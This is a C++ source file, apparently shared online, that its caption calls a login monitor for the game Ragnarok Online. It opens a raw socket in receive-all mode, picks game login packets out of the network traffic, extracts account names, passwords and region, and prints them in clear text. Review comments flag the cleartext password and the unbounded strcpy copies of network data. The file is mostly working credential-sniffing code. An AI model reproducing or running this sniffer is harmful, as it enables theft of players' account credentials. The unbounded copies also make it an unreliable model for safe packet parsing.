
📄 stdafx.cpp

📁 网游《仙境传说》的登录监控程序。 可以显示帐户、密码、大区等。 使用了rawsocket检测技术
// stdafx.cpp : source file that includes just the standard includes
//	GameSpy.pch will be the pre-compiled header
//	stdafx.obj will contain the pre-compiled type information

#include "stdafx.h"

// Debug-build boilerplate: route `new` through DEBUG_NEW and keep this
// file's name in THIS_FILE (presumably for the framework's allocation
// diagnostics -- confirm against stdafx.h).
#ifdef _DEBUG
#define new DEBUG_NEW
#undef THIS_FILE
static char THIS_FILE[] = __FILE__;
#endif


// Start Winsock for this process, asking for version 2.2.
// Returns TRUE when WSAStartup() reports success (0), FALSE otherwise.
BOOL InitSocket()
{
	WSADATA wsaInfo;
	const WORD wantedVersion = MAKEWORD(2,2);

	return (WSAStartup(wantedVersion, &wsaInfo) == 0) ? TRUE : FALSE;
}

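// Open a raw IP socket, bind it to the first address the local host name
// resolves to, switch it to receive-all mode (SIO_RCVALL) and pass every
// received datagram to DecodeIPPack() until recv() fails.
//
// Returns FALSE if any setup step fails, TRUE once the receive loop has ended.
//
// NOTE(review): SOCK_RAW plus SIO_RCVALL normally needs administrator rights,
// and it exposes all traffic seen by that interface to this process. A process
// opening such a socket is worth flagging in endpoint monitoring.
BOOL DoSniffing()
{
	int Length = 0;                    // bytes returned by the last recv()
	char RecvBuf[MAX_PACK_LEN] = {0};  // one captured datagram

	SOCKET SocketRaw = socket(AF_INET, SOCK_RAW, IPPROTO_IP);
	if (SocketRaw == INVALID_SOCKET)
	{
		printf("Fail To Create A Raw Socket\n");
		return FALSE;
	}

	char FAR name[MAX_HOSTNAME_LAN];
	if (gethostname(name, MAX_HOSTNAME_LAN) == SOCKET_ERROR)
	{
		printf("Fail To Get Host Name\n");
		closesocket(SocketRaw);
		return FALSE;
	}

	// gethostbyname() returns a pointer to storage owned by Winsock. It can be
	// NULL on failure and must never be passed to free(); the earlier version
	// dereferenced it unchecked and freed it on the error path.
	struct hostent FAR *pHostent = gethostbyname(name);

	SOCKADDR_IN sa;
	memset(&sa, 0, sizeof(sa));
	sa.sin_family = AF_INET;
	sa.sin_port = htons(0); // port is irrelevant for a raw socket

	// Only the first resolved address is used. Reject anything that is not an
	// IPv4 address of exactly the size we are about to copy.
	if (pHostent == NULL ||
		pHostent->h_addrtype != AF_INET ||
		pHostent->h_length != (int)sizeof(sa.sin_addr) ||
		pHostent->h_addr_list[0] == NULL)
	{
		printf("Get Host By Name Fails\n");
		closesocket(SocketRaw);
		return FALSE;
	}
	memcpy(&sa.sin_addr.S_un.S_addr, pHostent->h_addr_list[0], sizeof(sa.sin_addr));

	if (bind(SocketRaw, (PSOCKADDR)&sa, sizeof(sa)) == SOCKET_ERROR)
	{
		printf("Fail To Bind\n");
		closesocket(SocketRaw);
		return FALSE;
	}

	// Enable receive-all on the bound interface.
	DWORD dwBufferLen = 0;
	DWORD dwBufferInLen = 1; // 1 = turn the option on
	DWORD dwBytesReturned = 0;

	if (WSAIoctl(SocketRaw, SIO_RCVALL, &dwBufferInLen, sizeof(dwBufferInLen), &dwBufferLen, sizeof(dwBufferLen), &dwBytesReturned, NULL, NULL) == SOCKET_ERROR)
	{
		closesocket(SocketRaw);
		return FALSE;
	}

	while (TRUE)
	{
		// Keep this zero-fill: DecodeTCPPack() copies strings out of the
		// buffer with strcpy() and depends on trailing zero bytes to stop.
		memset(RecvBuf, 0, sizeof(RecvBuf));
		Length = recv(SocketRaw, RecvBuf, sizeof(RecvBuf), 0);
		if (Length == SOCKET_ERROR)
		{
			printf("Fail To Receive Data\n");
			break;
		}

		// The decoders update the Game* globals themselves; the result is not
		// acted on here (the template's follow-up action was already disabled).
		DecodeIPPack(RecvBuf, Length);
	}

	closesocket(SocketRaw);
	return TRUE;
}// End Of DoSniffing Function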


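//------------------------------------------------------------
// Purpose: Validate the IPv4 header of one captured datagram, store the
//          source and destination addresses as text in SourceIPAddress /
//          DestIPAddress, and pass TCP datagrams to DecodeTCPPack()
// Return Type: Boolean -- FALSE for non-TCP or malformed input, otherwise
//          the result of DecodeTCPPack()
// Parameters: 1.const char *Buffer -->The Received Buffer
// 2.const int BufferSize -->Number Of Valid Bytes In Buffer
//------------------------------------------------------------
BOOL DecodeIPPack(const char *Buffer,const int BufferSize)
{
	// The buffer comes straight off the network: make sure a whole IP header
	// is present before reading any of its fields.
	if (Buffer == NULL || BufferSize < (int)sizeof(IP_HEADER))
	{
		return FALSE;
	}

	const IP_HEADER *pIpheader = (const IP_HEADER *)Buffer;
	int Protocol = pIpheader->proto;
	if (Protocol != IPPROTO_TCP)
	{
		return FALSE; // only TCP is of interest
	}

	// Header length is the low nibble of h_lenver, counted in 4-byte words.
	// Fewer than 5 words is not a valid IPv4 header, and the TCP header that
	// DecodeTCPPack() will read must also lie inside the received bytes.
	// NOTE(review): assumes TCP_HEADER is the fixed 20-byte header -- confirm in stdafx.h.
	const int HeaderWords = pIpheader->h_lenver & 0xf;
	const int IPLength = (int)sizeof(unsigned long) * HeaderWords;
	if (HeaderWords < 5 || BufferSize - IPLength < (int)sizeof(TCP_HEADER))
	{
		return FALSE;
	}

	SOCKADDR_IN saSource, saDest;
	saSource.sin_addr.s_addr = pIpheader->sourceIP;
	saDest.sin_addr.s_addr = pIpheader->destIP;

	// strncpy() does not terminate the destination when the source fills it,
	// so copy one byte less and terminate explicitly. As before, both globals
	// are assumed to hold at least MAX_ADDR_LEN bytes.
	strncpy(SourceIPAddress, inet_ntoa(saSource.sin_addr), MAX_ADDR_LEN - 1); // source address as text
	SourceIPAddress[MAX_ADDR_LEN - 1] = '\0';
	strncpy(DestIPAddress, inet_ntoa(saDest.sin_addr), MAX_ADDR_LEN - 1); // destination address as text
	DestIPAddress[MAX_ADDR_LEN - 1] = '\0';

	// BufferSize is passed on unchanged (IP header still included) because
	// DecodeTCPPack()'s size comparisons are written against that value.
	return DecodeTCPPack(Buffer+IPLength, BufferSize);

}// End Of DecodeIPPack Function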

//------------------------------------------------------------ 
// Purpose: Inspect one captured TCP segment. For traffic to or from
//          GAME_SERVER_PORT, match three fixed packet shapes (by size and
//          first four bytes) and copy strings out of them into the
//          GameUid / GamePwd / GameWorld globals
// Return Type: Boolean -- TRUE when either port equals GAME_SERVER_PORT,
//          whether or not a packet shape matched; FALSE otherwise
// Parameters: 1.const char *TCPBuffer -->Start Of The TCP Header 
// 2.Const int BufferSize -->Size Supplied By The Caller; DecodeIPPack
//          Passes The Whole Datagram Length, IP Header Included
//
// NOTE(review): every strcpy() below copies network-supplied bytes into a
// global whose size is declared outside this file. Nothing here bounds the
// copy, so any host that can put a matching segment on the monitored
// interface controls how much is written. The copy ends only at the first
// zero byte, which relies on DoSniffing() zero-filling the receive buffer.
// NOTE(review): the account password is held in a global and written to
// stdout in clear text; treat console output and logs as sensitive.
//------------------------------------------------------------ 
BOOL DecodeTCPPack(const char * TCPBuffer,const int BufferSize) 
{ 
	TCP_HEADER * pTcpHeader; // TCP Header 
	int iSourcePort,iDestPort; // Source Port And DestPort 

	pTcpHeader = (TCP_HEADER * )TCPBuffer; // View The Buffer As A TCP Header (no length check here) 
	int TcpHeaderLen = pTcpHeader->th_lenres>>4; // Data Offset: High Nibble, In 4-Byte Words 
	TcpHeaderLen *= sizeof(unsigned long); 
	const char * TcpData = TCPBuffer + TcpHeaderLen; // Computed But Never Used Below 

	iSourcePort = ntohs(pTcpHeader->th_sport); // Get The Source Port 
	iDestPort = ntohs(pTcpHeader->th_dport); // Get The Destination Port 

	// A fixed 20-byte TCP header is assumed instead of TcpHeaderLen, and
	// PureSize is derived from the caller's BufferSize, so it is not the true
	// payload length when BufferSize still includes the IP header.
	const char * PureData = TCPBuffer + 20;
	const int PureSize = BufferSize - 20;


	//printf("%s:%d-->%s:%d\r\n",SourceIPAddress, iSourcePort, DestIPAddress, iDestPort); // Display A Message 
	if(iSourcePort == GAME_SERVER_PORT || iDestPort == GAME_SERVER_PORT)
	{

		if(PureSize == 75)
		{
			if(PureData[0] == (char)0x64 &&
				PureData[1] == (char)0x00 &&
				PureData[2] == (char)0x6d &&
				PureData[3] == (char)0x04)
			{
				// Login request packet
				// NOTE(review): unbounded copies of packet bytes -- see header note
				strcpy(GameUid, PureData + 6);
				strcpy(GamePwd, PureData + 30);


				//printf("%s:%s\n", GameUid, GamePwd);
				
			}

		}
		

		if(PureSize == 67)
		{
			if(PureData[0] == (char)0x69 &&
				PureData[1] == (char)0x00 &&
				PureData[2] == (char)0x4f &&
				PureData[3] == (char)0x00)
			{

				// Login-success reply
				GameLogined = true;
			}
		}

		if(PureSize == 52)
		{
			
			if(PureData[0] == (char)0xd2 &&
				PureData[1] == (char)0x33 &&
				PureData[2] == (char)0x1f &&
				PureData[3] == (char)0x11)
			
			{
				// Reply naming the region the account is in
				// NOTE(review): unbounded copy of packet bytes -- see header note
				strcpy(GameWorld, PureData + 6);

				// Writes the captured password to stdout in clear text
				printf("%s : %s @ %s logged in.\n", GameUid, GamePwd, GameWorld);


				/*
				char _cur_dir[MAX_PATH];
				GetCurrentDirectory(MAX_PATH, _cur_dir);
				sprintf(_cur_dir, "%s\\ac.exe %s %s", _cur_dir, GameWorld, GameUid);
				WinExec(_cur_dir, SW_SHOW);
				*/


				// IIACSLogined is also read and cleared by CheckGameQuit();
				// no synchronisation is visible in this file.
				IIACSLogined = true;
				acOnLogin(GameWorld, GameUid);
				
			}

		}
		

		
		
		return TRUE; // Segment Belongs To GAME_SERVER_PORT Traffic 
	} 

	return FALSE; // Not GAME_SERVER_PORT Traffic 
}// End Of DecodeTCPPack Function 

// Poll once per second, forever. While IIACSLogined is set, look for a
// top-level window whose class and title are both "仙境传说"; when none is
// found, clear the flag, call acOnLogout() and print "logout".
// The parameter p is not used.
void CheckGameQuit(void * p)
{
	for(;;)
	{
		const bool sessionActive = IIACSLogined ? true : false;
		if(sessionActive && !FindWindow("仙境传说", "仙境传说"))
		{
			IIACSLogined = false;
			acOnLogout();
			printf("logout");
		}
		Sleep(1000);
	}
}


#pragma comment(lib, "accl.lib")



